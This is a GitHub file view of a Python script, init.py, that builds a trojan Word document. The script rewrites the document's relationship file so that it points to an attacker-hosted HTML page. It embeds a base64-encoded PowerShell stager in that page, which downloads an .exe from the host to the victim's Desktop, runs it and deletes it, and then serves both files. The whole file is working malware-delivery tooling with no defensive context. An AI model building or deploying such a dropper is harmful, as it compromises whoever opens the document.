-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy pathinit.py
75 lines (52 loc) · 2.43 KB
/
init.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
from base64 import b64encode
from os import listdir, remove, rename
from shutil import copyfile, copytree, make_archive, rmtree
from xml.etree import ElementTree as ET
from server import init_server
def build_payload(host: str, port: int, build_directory: str) -> str:
payload_build_path = "bin"
payload_name = next(file for file in listdir(payload_build_path) if file.endswith(".exe"))
payload_target_path = f"$($env:USERPROFILE + '/Desktop/' + '{payload_name}')"
html_name = "index.html"
html_build_path = f"server/{html_name}"
copyfile(f"{build_directory}/{html_name}", html_build_path)
powershell_commands = "; ".join([
f"iwr http://{host}:{port}/{payload_build_path}/{payload_name} -OutFile {payload_target_path}",
f"{payload_target_path} | iex",
f"rm -Force -Path {payload_target_path}"
]).encode("utf-8")
with open("build/href.txt") as file:
staged_payload = file.read().replace("{ staged_commands }", b64encode(powershell_commands).decode("utf-8"))
with open(html_build_path, "r+") as file:
new_data = file.read().replace("{ staged_payload }", staged_payload)
file.seek(0)
file.write(new_data)
return html_build_path
def build_trojan(host: str, port: int, build_directory: str) -> str:
trojan_name = "trojan"
trojan_build_path = f"{build_directory}/docx"
trojan_target_path = "docx"
trojan_file_name = f"{trojan_name}.docx"
copytree(trojan_build_path, trojan_target_path)
with open(f"{trojan_target_path}/word/_rels/document.xml.rels", "r+") as f:
new_data = f.read().replace("{ staged_html }", f"http://{host}:{port}/server")
f.seek(0)
f.write(new_data)
make_archive(trojan_name, "zip", trojan_target_path)
rename(f"{trojan_name}.zip", trojan_file_name)
rmtree(trojan_target_path)
return trojan_file_name
def main():
root = ET.parse("config.xml").getroot()
get_element_from_host = lambda element: root.find(element).text
host_name = get_element_from_host("name")
port = int(get_element_from_host("port"))
build_directory = "build"
staged_trojan_path = build_trojan(host_name, port, build_directory)
staged_html_path = build_payload(host_name, port, build_directory)
init_server(host_name, port)
# Clean up when the server closes
remove(staged_trojan_path)
remove(staged_html_path)
if __name__ == "__main__":
main()